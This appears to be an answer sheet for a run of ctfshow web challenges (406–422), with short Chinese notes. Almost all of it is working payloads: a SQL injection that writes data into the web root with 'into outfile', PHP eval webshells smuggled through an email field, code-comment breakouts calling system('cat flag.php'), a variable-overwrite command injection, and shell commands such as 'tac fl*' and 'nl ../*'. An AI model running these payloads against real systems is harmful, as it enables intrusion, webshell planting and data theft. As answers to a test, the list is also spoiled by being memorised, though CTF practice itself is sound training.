406
http://www.baidu.com;'union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23
407
?ip=cafe::add
ip6地址,类的名字叫cafe都是16进制
408
?email="<?php eval($_POST[1]);?>"@123.php
409
注意这个是可以成功eval的,他把双引号前看做一个php脚本
?email="flageval($_POST[1]);?>"@123.com
410
?b=on
411
?b=yes
412
ctfshow=<?php system('cat flag.php')?>
这不是注释符号,直接传即可,注意追加的,错了重开环境
413
ctfshow=*/system('cat flag.php');/*
414
/?ctfshow=-1
415
?k=Getflag
416
?f[0]=ctf&f[1]=flag
或者
f=ctf::flag
417
?ctf=show
418
拖到最下面还有内容
die=0&clear=;cp flag.php test.txt
变量覆盖
419
code=eval($_GET[1]);
或者
code=echo `tac fl*`;
420
code=nl ../*
421
nl f*
422
nl *